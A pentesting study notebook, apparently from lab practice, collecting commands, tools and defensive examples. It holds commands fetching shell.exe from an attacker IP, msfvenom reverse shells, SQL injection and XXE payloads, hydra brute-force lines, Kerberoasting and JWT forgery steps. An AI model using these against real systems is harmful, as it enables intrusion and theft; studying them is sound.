Notes on the road to becoming a White Hat Hacker.
I have not actually become one; these are the notes I keep while studying toward it.
This time I am collecting commands and tips that are useful for pentesting here, on the casual assumption that they may come in handy later. It will therefore be updated from time to time.
I also record the videos and sites I used as references.
If you know of better sites or videos, please let me know.
One caveat up front: I am a noob, so there may be pointless or inexplicable actions and option choices. If you notice any, please point them out.
Useful Commands
Windows equivalents/alternatives of Linux commands
cat
type <FILE_NAME>
wget
bitsadmin.exe /TRANSFER <job name> <remote URL> <download destination>
powershell "Invoke-WebRequest -OutFile shell.exe -Uri http://10.13.6.60:8888/shell.exe"
Invoke-WebRequest -OutFile shell.exe -Uri http://10.13.6.60:8888/shell.exe
certutil.exe -urlcache -split -f "http://10.13.6.60:8888/shell.exe" shell.exe
Search files & show contents
Windows
dir /s *FILE_NAME*
type NAME_OF_THE_FILE
Reference:
https://qiita.com/asmin/items/d53e71ed98a377ca7823
NFS
showmount - show mount information for an NFS server
Linux
/usr/sbin/showmount
SMB
Linux
smbclient //[IP]/[SHARE]
Options:
-U [name] : to specify the user
-p [port] : to specify the port
A share can be downloaded recursively as follows:
smbget -R smb://<ip>/anonymous
Simple HTTP Server
Python3
python -m http.server [port]
Checking interface information (IP address, etc.)
Linux
ifconfig
Checking wireless interface information (IP address, etc.)
Linux
iwconfig
Switching user
Linux
su
Checking whether a machine responds (ping)
Linux
ping <ip_address>
ping -c <n> <ip_address>
n: number of ping requests to send
Displaying the ARP cache
Linux
arp [-a] <host_name>
-a: display in BSD style
https://youtu.be/qlK174d_uu8?t=3797
Checking listening ports
Linux
netstat [-ano]
Displaying the routing table
Linux
route
Running a command with administrator privileges
Linux
sudo
Starting/stopping the web server
Linux
service apache2 start
service apache2 stop
To have it start automatically at boot:
systemctl enable apache2
Starting/stopping the SSH server
Linux
service ssh start
service ssh stop
To have it start automatically at boot:
systemctl enable ssh
dig / whois
tctrace
Checking which users belong to a particular group
getent group
Way to crack SQLite databases
kali@kali:~/ダウンロード$ sqlite3 webapp.db
SQLite version 3.33.0 2020-08-14 13:23:32
Enter ".help" for usage hints.
sqlite> .tables
sessions users
sqlite> PRAGMA table_info(users);
0|userID|TEXT|1||1
1|username|TEXT|1||0
2|password|TEXT|1||0
3|admin|INT|1||0
sqlite> select * from users;
4413096d9c933359b898b6202288a650|admin|6eea9b7ef19179a06954edd0f6c05ceb|1
23023b67a32488588db1e28579ced7ec|Bob|ad0234829205b9033196ba818f7a872b|1
4e8423b514eef575394ff78caed3254d|Alice|268b38ca7b84f44fa0a6cdc86e6301e0|0
sqlite>
XXE Payload example
Internal entity (the entity "name" expands to "feast"):
<!DOCTYPE replace [<!ENTITY name "feast"> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>
External entity (pulls /etc/passwd into the document):
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
Checking permissions
Windows
icacls
Creating a hex dump
Linux
xxd -p | tr -d '\n'
File download (wget equivalent)
Windows
certutil.exe -urlcache -split -f http://10.13.6.60:80/win.exe
Useful Tips
Where user information is stored
Linux
/etc/passwd
Where password hashes are stored
Linux
/etc/shadow
sudo configuration (sudoers)
explanations
Payload Generator
msfvenom
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=[vpnIP] LPORT=[LPORT] -f exe -o reverse.exe
then run the following
> msfconsole
and
> use exploit/multi/handler
msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R
-p <payload> : the payload
lhost=<LOCAL_HOST> : local host IP address
lport=<LOCAL_PORT> : the port to listen on
R : export the payload in raw format
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>
-f <format> : Specifies the output format. In this case that is an executable (exe)
-o <file> : The output location and filename for the generated payload.
LHOST=<IP> : Specifies the IP to connect back to.
LPORT=<port> : The port on the local machine to connect back to.
getuid
timestomp <FILE_NAME> -v : display the created time, access time, modified time, and entry modified time of the file
Key logger: keyscan_start, then keyscan_dump
Metasploit
Search for vulnerability
search cve:2009 type:exploit platform:-linux
How to add modules from exploit db
Where authentication/authorization-related incident information is logged
Linux
/var/log/auth.log
SQL Injection Tips
Login bypass
Commonly used
' or true --
') or true --
Blind SQLi
?id=1' AND (ascii(substr((select database()),1,1))) = 115 --+
Note: 115 is 's' in ASCII. If the page comes back without an error, the condition was true, which means the first letter of the database name is 's'.
UNION SQLi
A UNION SQLi attack consists of 3 stages:
- Finding the number of columns
- Checking if the columns are suitable
- Attack and get some interesting data.
Finding the number of columns
Repeat 'ORDER BY' with the number increased by 1 each time until an error occurs. The value just before the error is the number of columns.
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
UNION SELECT attack
Repeat 'UNION SELECT' with NULL payloads, adding one NULL each time until an error occurs. The number of NULLs just before the error is the column count.
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
Note: on Oracle use ' UNION SELECT NULL FROM DUAL-- instead. The reason is that Oracle requires every SELECT statement to have a FROM clause; DUAL is an Oracle built-in table.
Checking for exploitable data types
Data worth extracting is most often stored with a string data type. On that assumption, after finding the column count, look for columns that are string or string-compatible.
Try string data ('a' here) in one column at a time, once per column, as below. If no error occurs, that column is a string or a compatible data type.
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
Other data that is often useful:
- database()
- user()
- @@version
- username
- password
- table_name
- column_name
Reference:
https://portswigger.net/web-security/sql-injection/union-attacks
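The login-bypass payloads and the UNION probes above all work the same way: the application splices user input into the SQL text, so a quote and a comment sequence rewrite the statement. The following is an added example (not code from the original post) that puts a vulnerable login beside its parameterized form on an in-memory SQLite table shaped like the sqlite dump earlier on this page; the rows, passwords and the function names are constructed for the demonstration. It uses `' OR 1=1 --`, which is the same idea as the page's `' or true --` (SQLite only accepts the `true` literal in newer versions).

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table (userID, username, password, admin)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (userID TEXT, username TEXT, password TEXT, admin INT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [
            ("u1", "admin", "admin-pass-1", 1),
            ("u2", "Bob", "bob-pass-2", 1),
            ("u3", "Alice", "alice-pass-3", 0),
        ],
    )
    return conn


def render_vulnerable_sql(username: str, password: str) -> str:
    """The statement text the vulnerable login actually sends to the database."""
    return (
        "SELECT username, admin FROM users "
        "WHERE username = '%s' AND password = '%s'" % (username, password)
    )


def login_vulnerable(conn, username: str, password: str):
    # String formatting: the input becomes part of the SQL grammar, so
    # "' OR 1=1 --" turns the WHERE clause into "username = '' OR 1=1" and
    # comments out the password check.
    return conn.execute(render_vulnerable_sql(username, password)).fetchone()


def login_parameterized(conn, username: str, password: str):
    # Bound parameters: the driver sends values separately from the statement,
    # so quotes and comment markers in the input are just characters to compare.
    sql = "SELECT username, admin FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    bypass = "' OR 1=1 --"
    print(render_vulnerable_sql(bypass, "x"))
    print("vulnerable   :", login_vulnerable(db, bypass, "x"))
    print("parameterized:", login_parameterized(db, bypass, "x"))
```

The same split applies to the UNION stage: with bound parameters a probe such as `' UNION SELECT NULL,NULL--` is compared literally against the username column and simply matches nothing.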
Tools
Linpeas
A tool that collects, in one go, information useful for Linux privilege escalation
SQLMap
Tips
Using a request saved from Burp Suite
sqlmap -r filename --dbms=mysql --dump
Identifying the hash type from a hash
online
Python
Identify it from the prefix
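As an added example (not from the original post), a small Python identifier that applies the prefix rule above: modular-crypt hashes announce their algorithm in a `$id$` prefix (the format that `openssl passwd -1` and `/etc/shadow` use later on this page), while a bare hex digest only gives a length, so for those it returns candidates rather than one answer. It also recognises the `user:rid:LM:NT:::` line format of the samdump2 output on this page. The helper names are assumptions.

```python
import re

# Modular-crypt prefixes as found in /etc/shadow and produced by `openssl passwd`.
CRYPT_PREFIXES = [
    ("$1$", "md5crypt (what `openssl passwd -1` produces)"),
    ("$2a$", "bcrypt"), ("$2b$", "bcrypt"), ("$2y$", "bcrypt"),
    ("$5$", "sha256crypt"),
    ("$6$", "sha512crypt (john --format=sha512crypt)"),
    ("$y$", "yescrypt"),
    ("$argon2id$", "argon2id"), ("$argon2i$", "argon2i"), ("$argon2d$", "argon2d"),
]

# A bare hex digest only tells you its length; these are the usual candidates.
HEX_CANDIDATES = {
    32: ["MD5", "NTLM", "MD4", "LM"],
    40: ["SHA-1", "RIPEMD-160"],
    64: ["SHA-256", "SHA3-256"],
    96: ["SHA-384"],
    128: ["SHA-512", "SHA3-512"],
}


def identify_hash(value: str) -> list:
    """Return candidate hash types for one hash string (or one samdump2/pwdump line)."""
    h = value.strip()
    for prefix, name in CRYPT_PREFIXES:
        if h.startswith(prefix):
            return [name]
    # pwdump-style line: user:rid:LMhash:NThash:::
    if re.fullmatch(r"[^:]*:\d+:[0-9a-fA-F]{32}:[0-9a-fA-F]{32}:::", h):
        return ["pwdump line (LM hash, then NT hash)"]
    # MySQL 4.1+ stores '*' followed by 40 upper-case hex digits.
    if re.fullmatch(r"\*[0-9A-F]{40}", h):
        return ["MySQL 4.1+ (SHA1 of SHA1)"]
    if re.fullmatch(r"[0-9a-fA-F]+", h) and len(h) in HEX_CANDIDATES:
        return list(HEX_CANDIDATES[len(h)])
    return ["unknown"]


def summarize(values) -> dict:
    """Identify a batch of hashes, keyed by the input string."""
    return {v: identify_hash(v) for v in values}


if __name__ == "__main__":
    # Constructed sample hashes plus one line copied from the samdump2 output on this page.
    samples = [
        "$6$saltsalt$constructedhashvalue",
        "$1$salt$constructedhashvalue",
        "31d6cfe0d16ae931b73c59d7e0c089c0",
        "admin:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    ]
    for k, v in summarize(samples).items():
        print(k, "->", ", ".join(v))
```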
GoBuster(Brute-force URIs, DNS subdomains, virtual host names)
gobuster dir -u http://example.com -w wordlist.txt -x php,txt,html
kali@kali:~$ gobuster --help
Usage:
gobuster [command]
Available Commands:
dir Uses directory/file brutceforcing mode
dns Uses DNS subdomain bruteforcing mode
help Help about any command
vhost Uses VHOST bruteforcing mode
Flags:
-h, --help help for gobuster
-z, --noprogress Don't display progress
-o, --output string Output file to write results to (defaults to stdout)
-q, --quiet Don't print the banner and other noise
-t, --threads int Number of concurrent threads (default 10)
-v, --verbose Verbose output (errors)
-w, --wordlist string Path to the wordlist
Use "gobuster [command] --help" for more information about a command.
wfuzz (Fuzzing)
Fuzzing has been described as a fancier form of brute force.
Fuzzing is using security tools to automate the input of data we provide into things such as websites or software applications. Fuzzing is an extremely effective process as computers can perform laborious actions like trying to find hidden files/folders, try different usernames and passwords much quicker than a human can (and is willing to do...)
wfuzz -c -z file,/usr/share/wordlists/dirb/big.txt localhost:80/FUZZ/note.txt
kali@kali:~$ wfuzz -h
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
* *
* Version up to 1.4c coded by: *
* Christian Martorella (cmartorella@edge-security.com) *
* Carlos del ojo (deepbit@gmail.com) *
* *
* Version 1.4d to 2.4.5 coded by: *
* Xavier Mendez (xmendez@edge-security.com) *
********************************************************
Usage: wfuzz [options] -z payload,params <url>
FUZZ, ..., FUZnZ wherever you put these keywords wfuzz will replace them with the values of the specified payload.
FUZZ{baseline_value} FUZZ will be replaced by baseline_value. It will be the first request performed and could be used as a base for filtering.
Options:
-h : This help
--help : Advanced help
--version : Wfuzz version details
-e <type> : List of available encoders/payloads/iterators/printers/scripts
-c : Output with colors
-v : Verbose information.
--interact : (beta) If selected,all key presses are captured. This allows you to interact with the program.
-p addr : Use Proxy in format ip:port:type. Repeat option for using various proxies.
Where type could be SOCKS4,SOCKS5 or HTTP if omitted.
-t N : Specify the number of concurrent connections (10 default)
-s N : Specify time delay between requests (0 default)
-R depth : Recursive path discovery being depth the maximum recursion level.
-L, --follow : Follow HTTP redirections
-u url : Specify a URL for the request.
-z payload : Specify a payload for each FUZZ keyword used in the form of type,parameters,encoder.
A list of encoders can be used, ie. md5-sha1. Encoders can be chained, ie. md5@sha1.
Encoders category can be used. ie. url
Use help as a payload to show payload plugin's details (you can filter using --slice)
-w wordlist : Specify a wordlist file (alias for -z file,wordlist).
-V alltype : All parameters bruteforcing (allvars and allpost). No need for FUZZ keyword.
-X method : Specify an HTTP method for the request, ie. HEAD or FUZZ
-b cookie : Specify a cookie for the requests
-d postdata : Use post data (ex: "id=FUZZ&catalogue=1")
-H header : Use header (ex:"Cookie:id=1312321&user=FUZZ")
--basic/ntlm/digest auth : in format "user:pass" or "FUZZ:FUZZ" or "domain\FUZ2Z:FUZZ"
--hc/hl/hw/hh N[,N]+ : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--sc/sl/sw/sh N[,N]+ : Show responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--ss/hs regex : Show/Hide responses with the specified regex within the content
CrackStation (for cracking password hashes)
Maltego (information gathering)
https://www.maltego.com/
Automatically collects information about a target from publicly available sources
Explanatory video
https://youtu.be/zemNLx0-LRw
Reverse shells
PHP
/usr/share/webshells/php/php-reverse-shell.php
Others
Impacket
Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.
The impacket package installed on Kali Linux is said to be broken, so it apparently needs to be uninstalled (purged) first.
apt purge '*impact*'
cd <directory to install into>
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .
Getting the list of hosts that respond to ping (shell)
Script (ipsweep.sh)
#!/bin/bash
# Usage: ./ipsweep.sh 192.168.1   (the first three octets of the /24 to sweep)
if [ "$1" == "" ]
then
    echo "You forgot an IP address!"
    echo "Syntax: ./ipsweep.sh 192.168.1"
else
    for ip in $(seq 1 254); do
        # one echo request per host, in the background; print only the addresses that answered
        ping -c 1 "$1.$ip" | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
    done
    wait   # let the background pings finish before the script exits
fi
How to run
chmod +x ipsweep.sh
./ipsweep.sh <network prefix, i.e. the first three octets>
(Example)
./ipsweep.sh 192.168.1 > iplist.txt
iplist.txt can then be used as the target list for nmap
hashcat
Fast password cracker, accelerated by GPU
tmux
Tplmap
Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system.
The tool and its test suite are developed to research the SSTI vulnerability class and to be used as offensive security tool during web application penetration tests.
LinEnum
LinEnum is a simple bash script that performs common commands related to privilege escalation, saving time and allowing more effort to be put toward getting root.
Anonymous net surfing
Proxy Switcher
Easy to switch proxy servers
https://www.proxyswitcher.com/
cyber ghost VPN
VPN service
https://www.cyberghostvpn.com/en_US/
others
Tor (https://www.torproject.org)
Burp Suite (https://www.portswigger.net)
Hotspot Shield (https://www.hotspotshield.com)
Proxifier (https://www.proxifier.com)
Charles (http://www.charlesproxy.com)
Fiddler (http://www.telerik.com)
Protoport Proxy Chain (http://www.protoport.com)
ProxyCap (http://www.proxycap.com)
Module
GTFOBins
GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
Have I Been Pwned
Check if you have an account that has been compromised in a data breach
OSINT
Namechk
WhatsMyName
NameChekup
sherlock
Script for insecure deserialization (OWASP Top 10 vulnerability)
explanation Python Pickle module
dirb
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response.
DIRB comes with a set of preconfigured attack wordlists for easy usage but you can use your custom wordlists. Also DIRB sometimes can be used as a classic CGI scanner, but remember is a content scanner not a vulnerability scanner.
DIRB main purpose is to help in professional web application auditing. Specially in security related testing. It covers some holes not covered by classic web vulnerability scanners. DIRB looks for specific web objects that other generic CGI scanners can’t look for. It doesn’t search vulnerabilities nor does it look for web contents that can be vulnerables.
dirbuster
wordlist
nikto
cheat sheet
kali@kali:~$ nikto -h http://10.10.147.61:1234/manager/html -id bob:bubbles
XSRFProbe
XSRFProbe is an advanced Cross Site Request Forgery (CSRF/XSRF) Audit and Exploitation Toolkit. Equipped with a powerful crawling engine and numerous systematic checks, it is able to detect most cases of CSRF vulnerabilities, their related bypasses and further generate (maliciously) exploitable proof of concepts with each found vulnerability. For more info on how XSRFProbe works, see XSRFProbe Internals on the wiki.
Nessus
Vulnerability scanning tool.
A free version is also available.
https://www.tenable.com/products/nessus
Enum4Linux
A tool for enumerating SMB on both Windows and Linux systems.
Basically a wrapper around the tools included in the Samba package; it makes it easy to quickly extract information from SMB-related targets.
Installed on Kali Linux by default.
Official Download
SecLists (collection of common usernames, passwords (default passwords), URLs etc.)
SecLists is a collection of common lists including usernames, passwords, URLs and much more.
hydra (online password cracking tool)
syntax
hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp
SECTION : FUNCTION
hydra : Runs the hydra tool
-t 4 : Number of parallel connections per target
-l [user] : Points to the user whose account you're trying to compromise
-P [path to dictionary] : Points to the file containing the list of possible passwords
-vV : Sets verbose mode to very verbose, shows the login+pass combination for each attempt
[machine IP] : The IP address of the target machine
ftp / protocol : Sets the protocol
kali@kali:~$ hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV 10.10.35.24 ssh
hydra -l <username> -P <full path to pass> 10.10.217.219 -t 4 ssh
hydra -l <username> -P <wordlist> 10.10.217.219 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
Breaking RSA cryptography
IDS (Intrusion Detection System) and IPS (Intrusion Prevention System)
Suricata
Snort
Firewall
pfsense
Reverse Engineering
Radare2
ILSpy
This is for .NET
https://github.com/icsharpcode/ILSpy
Dotpeek
This is for .NET
https://www.jetbrains.com/decompiler/
Kerberos
Kerbrute
Bruteforce Kerberos, Active Directory
Rubeus
C# toolset for raw Kerberos interaction and abuses.
Kerberoasting w/ Impacket
Prerequisite: the attacking user must be a Service Account.
sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.191.46 -request
AS-REP roasting
Prerequisite: the attacking user must have pre-authentication disabled. (Unlike Kerberoasting, it is not required to be a Service Account.)
Reference
Powerview CheatShet
https://gist.github.com/HarmJ0y/3328d954607d71362e3c
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
SQL injection
Explanations and related articles
SQLMap Cheat Sheet
JWT (JSON Web Token)
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJQYXJhZG94IiwiaWF0IjoxNjEwNDU0MjM5LCJleHAiOjE2MTA0NTQzNTksImRhdGEiOnsicGluZ3UiOiJub290cyJ9fQ.gSf3YRlqXj6OWNhckD_zWYdidvydVdFRirj5W9o-YwzXyWQeMi0M9Z0riy92JEKkeGeC3TP1_O6WATSa7pxK2xHcw3ubexeifZtYOQWugNuzcHGYPweipcCDhSPLFQ3PuIj9Hjyws05bHZm2vwptcsCuyY0ax6VMTqlYb8wzE_Wgp-CqwgF9M74tp1tJI0nVrL47Tz2JvS0MYZG1Lt5ad0Sttc9Ce4BxamfTm_qEVcD42wE7RsQfyjtU7clNT1DVkTvwmyCqS2GnXd-kHwBHLVrjnrWJ_FMCA3BVwuctjQJlGqGpeyKvRCiL3j6FFPeqtgh7ZkfsjJIJ9X-Xo4VGHA
Decode it since it is encoded by Base64 encoding.
{"typ":"JWT","alg":"HS256"}{"iss":"Paradox","iat":1610454239,"exp":1610454359,"data":{"pingu":"noots"}}
(followed by the raw signature bytes, which are binary and do not render as text)
Change the algorithm in the header from RS256 to HS256 and re-encode it.
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJQYXJhZG94IiwiaWF0IjoxNjEwNDU0MjM5LCJleHAiOjE2MTA0NTQzNTksImRhdGEiOnsicGluZ3UiOiJub290cyJ9fQ.gSf3YRlqXj6OWNhckD_zWYdidvydVdFRirj5W9o-YwzXyWQeMi0M9Z0riy92JEKkeGeC3TP1_O6WATSa7pxK2xHcw3ubexeifZtYOQWugNuzcHGYPweipcCDhSPLFQ3PuIj9Hjyws05bHZm2vwptcsCuyY0ax6VMTqlYb8wzE_Wgp-CqwgF9M74tp1tJI0nVrL47Tz2JvS0MYZG1Lt5ad0Sttc9Ce4BxamfTm_qEVcD42wE7RsQfyjtU7clNT1DVkTvwmyCqS2GnXd-kHwBHLVrjnrWJ_FMCA3BVwuctjQJlGqGpeyKvRCiL3j6FFPeqtgh7ZkfsjJIJ9X-Xo4VGHA
Convert the public key to hex so openssl can use it as the HMAC key.
$ cat public.pem | xxd -p | tr -d "\n"
Generate HMAC signature by supplying our public key as ASCII hex and with the token.
$ echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJQYXJhZG94IiwiaWF0IjoxNjEwNDg4Mzg2LCJleHAiOjE2MTA0ODg1MDYsImRhdGEiOnsicGluZ3UiOiJub290cyJ9fQ" |
openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e205055424c4943204b45592d2d2d2d2d0a4d494942496a414e42676b71686b6947397730424151454641414f43415138414d49494243674b4341514541716938546e75514247584f47782f4c666e344a460a4e594f4832563171656d6673383373745763315a4251464351415a6d55722f736762507970597a7932323970466c3662476571706952487253756648756737630a314c4379616c795545502b4f7a65716245685353755573732f5879667a79624975736271494445514a2b5965783343646777432f68414633787074562f32742b0a48367930476468317765564b524d382b5161655755784d474f677a4a59416c55635241503564526b454f5574534b4842464f466845774e425872664c643736660a5a58504e67794e30547a4e4c516a50514f792f744a2f5646713843514745342f4b35456c5253446c6a346b7377786f6e575859415556786e71524e314c4748770a32473551524532443133734b484343385a725a584a7a6a36374872713568325341444b7a567a684138415733575a6c504c726c46543374312b695a366d2b61460a4b774944415141420a2d2d2d2d2d454e44205055424c4943204b45592d2d2d2d2d0a
(stdin)= d46b02fd2a91fbc68a0d946f6b9e5f1a9659c1902fedc39f7f05ae0ba7b12971
Convert signature (Hex to "base64 URL")
$ python2 -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('d46b02fd2a91fbc68a0d946f6b9e5f1a9659c1902fedc39f7f05ae0ba7b12971')).replace('=','')\")"
1GsC_SqR-8aKDZRva55fGpZZwZAv7cOffwWuC6exKXE
Brute force the secret
For HS256, brute-forcing the secret is possible since HS256 is a symmetric algorithm.
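The steps above only work if the server lets the token's header choose the algorithm: it was issued as RS256, the header is changed to HS256, and the server then verifies the HMAC with the public key it already has. The following is an added example, not code from the original post, showing the server-side defence in Python: the verifier pins the algorithm it expects and rejects anything else before looking at the signature, then checks the MAC with a constant-time compare and enforces `exp`. It also reproduces the decode step on the page's own token and the hex-to-base64url conversion from the page's openssl output. The secret, the sample payload and the function names are constructed for the example; only the token string and the hex digest come from the page.

```python
import base64
import binascii
import hashlib
import hmac
import json
import time

# Token copied from this page (header alg is RS256); it is only decoded here, never trusted.
PAGE_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9."
    "eyJpc3MiOiJQYXJhZG94IiwiaWF0IjoxNjEwNDU0MjM5LCJleHAiOjE2MTA0NTQzNTksImRhdGEiOnsicGluZ3UiOiJub290cyJ9fQ."
    "gSf3YRlqXj6OWNhckD_zWYdidvydVdFRirj5W9o-YwzXyWQeMi0M9Z0riy92JEKkeGeC3TP1_O6WATSa7pxK2xHcw3ubexeifZtYOQWugNuzcHGYPweipcCDhSPLFQ3PuIj9Hjyws05bHZm2vwptcsCuyY0ax6VMTqlYb8wzE_Wgp-CqwgF9M74tp1tJI0nVrL47Tz2JvS0MYZG1Lt5ad0Sttc9Ce4BxamfTm_qEVcD42wE7RsQfyjtU7clNT1DVkTvwmyCqS2GnXd-kHwBHLVrjnrWJ_FMCA3BVwuctjQJlGqGpeyKvRCiL3j6FFPeqtgh7ZkfsjJIJ9X-Xo4VGHA"
)


def b64url_decode(s: str) -> bytes:
    # JWT strips the '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_unverified(token: str) -> dict:
    """What any client can read: header and payload are just base64url, not encrypted."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    return {
        "header": json.loads(b64url_decode(header_b64)),
        "payload": json.loads(b64url_decode(payload_b64)),
        "signature_b64": signature_b64,
    }


def hex_sig_to_b64url(hex_digest: str) -> str:
    """The 'Hex to base64 URL' step from the page, in Python 3."""
    return b64url_encode(binascii.unhexlify(hex_digest))


def _json_b64(obj) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode("utf-8"))


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Issue an HS256 token (constructed issuer side, for the demonstration)."""
    signing_input = _json_b64({"typ": "JWT", "alg": "HS256"}) + "." + _json_b64(payload)
    mac = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(mac)


def with_header(token: str, header: dict) -> str:
    """Swap the header of an existing token, keeping payload and signature (attacker's edit)."""
    _, payload_b64, signature_b64 = token.split(".")
    return _json_b64(header) + "." + payload_b64 + "." + signature_b64


def verify_hs256(token: str, secret: bytes, now: int = None) -> dict:
    """Verifier that pins HS256: the header is never allowed to pick the algorithm."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, signature_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("algorithm %r not allowed; this verifier only accepts HS256" % header.get("alg"))
    expected = hmac.new(secret, (header_b64 + "." + payload_b64).encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(signature_b64)):
        raise ValueError("signature mismatch")
    payload = json.loads(b64url_decode(payload_b64))
    now = int(time.time()) if now is None else now
    if "exp" in payload and now >= int(payload["exp"]):
        raise ValueError("token expired")
    return payload


def check_token(token: str, secret: bytes, now: int = None) -> str:
    """Human-readable verdict for one token."""
    try:
        verify_hs256(token, secret, now)
    except (ValueError, binascii.Error) as exc:
        return "rejected: " + str(exc)
    return "ok"


if __name__ == "__main__":
    print(decode_unverified(PAGE_TOKEN)["header"])
    secret = b"constructed-demo-secret"
    tok = sign_hs256({"sub": "alice", "exp": 1700000000}, secret)
    print(check_token(tok, secret, now=1699999000))
    print(check_token(with_header(tok, {"typ": "JWT", "alg": "none"}), secret, now=1699999000))
    print(check_token(PAGE_TOKEN, secret))
```

A server that accepts RS256 tokens would pin RS256 the same way and pass the public key to an RSA verifier; the point is that the expected algorithm and the key come from server configuration, never from the token.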
Cross-Site Scripting (XSS)
Explanations and related articles
https://developers.google.com/web/fundamentals/security/csp
https://www.hacksplaining.com/exercises/xss-stored
Cheat sheet
SSRF (Server-Side Request Forgery)
Bypass filters.
http://[::]:3306 or
http://:::3306
IDOR (Insecure Direct Object Reference)
IDOR is the act of exploiting a misconfiguration in the way user input is handled, to access resources you wouldn't ordinarily be able to access.
Rainbow Table Attack
Explanations and related articles
Reverse Shell
What is it?
snippet for PHP
Cheat sheet
ICMP Shell
MIME Sniffing
Explanations and related articles
- Can lead to an XSS vulnerability
- Can be a loophole even when CSP (Content-Security-Policy) is configured
- Depends on browser behaviour
What should we do
- Set the Content-Type header of the HTTP response correctly
- Set the X-Content-Type-Options header to nosniff (nosniff is the only value that can be set)
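As an added example (not from the original post), a Python check for the two mitigations just listed: `audit_response_headers` reports a response that is missing a Content-Type, serves text without a charset, or lacks `X-Content-Type-Options: nosniff`, and `headers_for_file` builds the corrected headers for a static file. The sample header sets are constructed.

```python
import mimetypes

# Constructed sample responses: the weak configuration and the corrected one.
WEAK_HEADERS = {"Server": "demo", "Content-Length": "120"}
FIXED_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "X-Content-Type-Options": "nosniff",
}


def audit_response_headers(headers: dict) -> list:
    """Return a list of findings; an empty list means both mitigations are in place."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    ctype = h.get("content-type", "")
    media_type = ctype.split(";")[0].strip().lower()
    if not media_type:
        findings.append("Content-Type missing: the browser will sniff the body to choose a type")
    elif media_type.startswith("text/") and "charset=" not in ctype.lower():
        findings.append("Content-Type %s has no charset; the browser may guess the encoding" % media_type)
    if h.get("x-content-type-options", "").strip().lower() != "nosniff":
        findings.append("X-Content-Type-Options is not 'nosniff': sniffing stays enabled")
    return findings


def headers_for_file(path: str) -> dict:
    """Headers a static file should be served with (mimetypes is the stdlib lookup)."""
    guessed, _ = mimetypes.guess_type(path)
    # Unknown types are served as opaque bytes instead of being left to sniffing.
    ctype = guessed or "application/octet-stream"
    if ctype.startswith("text/"):
        ctype += "; charset=utf-8"
    return {"Content-Type": ctype, "X-Content-Type-Options": "nosniff"}


if __name__ == "__main__":
    for name, hdrs in (("weak", WEAK_HEADERS), ("fixed", FIXED_HEADERS)):
        print(name, "->", audit_response_headers(hdrs) or "no findings")
    print(headers_for_file("index.html"))
```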
CSRF (Cross-site Request Forgery)
Explanations and related articles
Google Dorks
Finding exploits (CVE - Common Vulnerabilities and Exposures)
NVD
CVE numbering format: CVE-year-ID
